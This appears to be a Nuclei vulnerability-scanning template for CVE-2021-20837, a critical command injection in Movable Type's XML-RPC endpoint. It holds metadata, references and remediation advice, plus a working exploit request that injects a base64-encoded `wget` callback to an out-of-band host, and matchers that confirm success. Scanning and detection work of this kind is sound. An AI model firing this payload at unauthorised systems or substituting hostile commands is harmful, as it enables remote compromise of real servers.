id: CVE-2021-20837 info: name: MovableType - Remote Command Injection author: dhiyaneshDK,hackergautam severity: critical description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. remediation: | Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability in MovableType. reference: - https://nemesis.sh/posts/movable-type-0day/ - https://github.com/ghost-nemesis/cve-2021-20837-poc - https://twitter.com/cyber_advising/status/1454051725904580608 - https://nvd.nist.gov/vuln/detail/CVE-2021-20837 - http://packetstormsecurity.com/files/164818/Movable-Type-7-r.5002-XMLRPC-API-Remote-Command-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-20837 cwe-id: CWE-78 epss-score: 0.97165 epss-percentile: 0.99736 cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:* metadata: max-request: 1 vendor: sixapart product: movable_type tags: packetstorm,cve,cve2021,rce,movable http: - raw: - | POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml mt.handler_to_coderef {{base64("`wget http://{{interactsh-url}}`")}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word words: - "failed loading package" - type: status status: - 200 # digest: 4a0a0047304502202934943d4966e0b7bf99b80072b387a7da84ef87c4b46877a56a0cb34377adcf02210088c52f5cb3549b1359c4d674f08474cdfd050bc66edc381bcf99a191ff327d85:922c64590222798bb761d5b6d8e72950